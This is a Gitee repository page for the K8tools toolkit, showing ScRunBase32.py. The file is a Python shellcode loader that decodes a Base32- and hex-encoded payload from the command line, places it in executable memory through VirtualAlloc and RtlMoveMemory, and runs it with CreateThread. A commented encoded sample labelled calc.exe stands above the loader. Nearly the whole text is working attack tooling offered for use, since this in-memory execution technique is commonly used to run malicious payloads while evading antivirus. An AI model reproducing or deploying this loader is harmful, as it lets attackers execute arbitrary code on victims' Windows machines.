77 Star 336 Fork 133

bxqtee / K8tools

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
ScRunBase32.py 1.78 KB
一键复制 编辑 原始数据 按行查看 历史
k8gege 提交于 2019-07-27 15:21 . Add files via upload
#scrun by k8gege
import ctypes
import sys
import base64
#calc.exe
#IRBEGM2EHE3TIMRUIY2EERKFHA2UCMRXGEZTKRRTGFBTSQRRGMZTGMJXG4YTOOBTIM3TANBQGM4UMNBZIM2UKNSBGM4DMOBQGA4TKQRVG5DDGOBQIJCTMNRSGFDDMQ2CIRBEMNJXIM4TSRBXG5CUIMBQHE3DGRRSIZCDGRKDGRBDSRCCG4YUINJQIZCTIRCEGE2TCMJZHAYUMNCBIYYUCMKEGA4UMRRQIU3DAQZWIZATAQSGGVBEGMRVGVBUEMJZIRDDKNBRIIYTMNKGGJDDCRKFHAYTIOBVGIYTGOBYGQ4TENSBIEYECRKGIQ2ECRBRGYZTCRKCGY4TQMBYIQ2TIQZRIJCDSMRXIFBTEQJSGVCUEOJTHAZUCOCGGVCDIMRTGUZTQMBSIU2TARKFHEZUMNBSIIZTIMJRIU4TQQSCIY4DCQZZGJATCMZVG44TSMRQIQ4DCM2DGUZDIRCGIYYDORBVGA2TIRRXGUYUIMJSIVCEGNZVIJAUMNJXIQZEMNRWGVBDQMJSIZBUKMBUGI3TGQSGIM2TCNJRGY3DMQKBG5CDGMKDIQZUCN2FIIYUKNZTIMYEIQJZGUYUGOJXIUZDORRVHE3DOQJZGIZEGQSFGA3TIQRXGRCTMRBYG43EIOCDHA4DANBYGQ3EGNSGGE2EKRBWHEZEEOJSGFCDAMZSGQ3TOMRSIIYDINJVGI2DCNJXIQ3DGRKBHBDDENKFIE2EENA=
shellcode=bytearray(base64.b32decode(sys.argv[1]).decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
PowerShell
1
https://gitee.com/bxqtee/K8tools.git
git@gitee.com:bxqtee/K8tools.git
bxqtee
K8tools
K8tools
master

搜索帮助